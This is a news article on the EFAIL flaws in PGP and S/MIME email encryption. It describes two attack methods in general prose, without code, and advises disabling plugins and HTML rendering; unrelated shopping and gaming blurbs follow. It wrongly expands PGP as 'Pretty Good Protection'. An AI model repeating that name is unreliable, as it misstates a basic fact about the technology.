Skip to main content

Email encryption flaw gives hackers full access to your secret messages

Researchers at the Munster University of Applied Sciences discovered vulnerabilities in the Pretty Good Protection (PGP) and S/MIME technologies used to encrypt email. The problem resides in how email clients use these plug-ins to decrypt HTML-based emails. Individuals and companies are encouraged to disable PGP and/or S/MIME in their email clients for now and use a separate application for message encryption. 

Called EFAIL, the vulnerability abuses “active” content rendered within HTML-based emails, such as images, page styles, and other non-text content stored on a remote server. To successfully carry out an attack, the hacker must first have the encrypted email in possession, whether it’s through eavesdropping, hacking into an email server, and so on. 

The first attack method is called “Direct Exfiltration” and abuses vulnerabilities in Apple Mail, iOS Mail, and Mozilla Thunderbird. An attacker creates an HTML-based email comprising of three parts: the start of an image request tag, the “stolen” PGP or S/MIME ciphertext, and the end of an image request tag. The attacker then sends this revised email to the victim. 

On the victim’s end, the email client first decrypts the second part and then combines all three into one email. It then converts everything into an URL form starting with the hacker’s address and sends a request to that URL to retrieve the nonexistent image. The hacker receives the image request, which contains the entire decrypted message. 

The second method is called the “CBC/CFB Gadget Attack,” which resides within the PGP and S/MIME specifications, affecting all email clients. In this case, the attacker locates the first block of encrypted plaintext in the stolen email and adds a fake block filled with zeroes. The attacker then injects image tags into the encrypted plaintext, creating a single encrypted body part. When the victim’s client opens the message, the plaintext is exposed to the hacker. 

Ultimately, if you don’t use PGP or S/MIME for email encryption, then there’s nothing to worry about. But individuals, companies, and corporations who use these technologies on a daily basis are advised to disable related plugins and use a third-party client to encrypt emails, such as Signal (iOS, Android). And because EFAIL relies on HTML-based emails, disabling HTML rendering is also advised for now. 

“This vulnerability might be used to decrypt the contents of encrypted emails sent in the past. Having used PGP since 1993, this sounds baaad (sic),” F-Secure’s Mikko Hypponen wrote in a tweet. He later said that people use encryption for a reason: Business secrets, confidential information, and more.  

According to the researchers, “some” email client developers are already working on patches that either eliminates EFAIL altogether or makes the exploits harder to accomplish. They say the PGP and S/MIME standards need an update, but that “will take some time.” The full technical paper can be read here. 

The problem was first leaked by the Süddeutschen Zeitun newspaper prior to the scheduled news embargo. After the EFF contacted the researchers to confirm the vulnerabilities, the researchers were forced to release the technical paper prematurely.

Editors' Recommendations

Kevin Parrish
Former Digital Trends Contributor
Kevin started taking PCs apart in the 90s when Quake was on the way and his PC lacked the required components. Since then…
One of Samsung’s best curved monitors is $600 off for the holidays
The Samsung Odyssey G9 monitor on a desk in an apartment.

Samsung has one of the best monitor deals for avid gamers who want their games to sparkle on screen. Today, you can buy the Samsung 49-inch Odyssey G9 DQHD QLED Curved Gaming Monitor for $900, saving a huge $600 off the regular price of $1,500. A fantastic investment for anyone keen to enjoy a truly immersive gaming experience, it’s part of Samsung’s cyber week deals season so don’t count on it sticking around for long. Here’s what we know about it.

Why you should buy the Samsung 49-inch Odyssey G9 DQHD QLED Curved Gaming Monitor
Keen to rival the best gaming monitors, the Samsung 49-inch Odyssey G9 DQHD QLED Curved Gaming Monitor is perfect for immersive gaming. It’s Samsung’s largest 1000R gaming monitor, matching the curve of the human eye while offering the screen space of two 27-inch panels.

Read more
This Alienware gaming laptop with an RTX 4090 is $700 off today
A person types on an Alienware M15 at a desk.

One of the best gaming laptop deals comes, predictably, from Dell. Today, you can buy the Alienware m16 gaming laptop for $2,800 thereby saving $700 off the usual price of $3,500. A high-end gaming laptop, this is one that will prove to be a fantastic investment for your gaming future. If you’re keen to learn more, take a look below at what we have to say about it or simply hit the buy button to get straight to the specs and making a purchase.

Why you should buy the Alienware m16 gaming laptop
Alienware is responsible for many of the best gaming laptops with a penchant for offering high-end hardware. This particular model boasts a 13th-generation Intel Core i9 processor teamed up with a huge 32GB of memory and 2TB of SSD storage. Continuing its powerhouse reputation, it also has an Nvidia GeForce RTX 4090 graphics card with 16GB of dedicated VRAM. That’s a fantastic set of specs to ensure that you won’t have any trouble playing the latest games for a long time to come. If you’re looking ahead and want to make sure you can play games in style for a while to come, this is the solution for you. It won’t become out of date any time soon.

Read more
To celebrate its milestone, here are the best (and worst) examples of RTX in games
Portal RTX running on the Surface Laptop Studio 2.

Nvidia just passed a huge milestone with RTX. The feature set is now available in over 500 games or apps, which is a massive accomplishment considering how big of a controversy the RTX platform was when Nvidia introduced it five years ago. We've come a long way since Battlefield V and Quake 2 RTX, so it's a good chance to look back.

There are over 500 games and apps with RTX features now, and that breaks down like this: 366 games with DLSS, 138 games with ray tracing, and 7 games with path tracing. In addition, there are 75 apps with ray tracing and 14 apps with DLSS. Out of that huge pool, here are the best (and worst) examples of what RTX has to offer for PC gamers.
The best: Portal RTX

Read more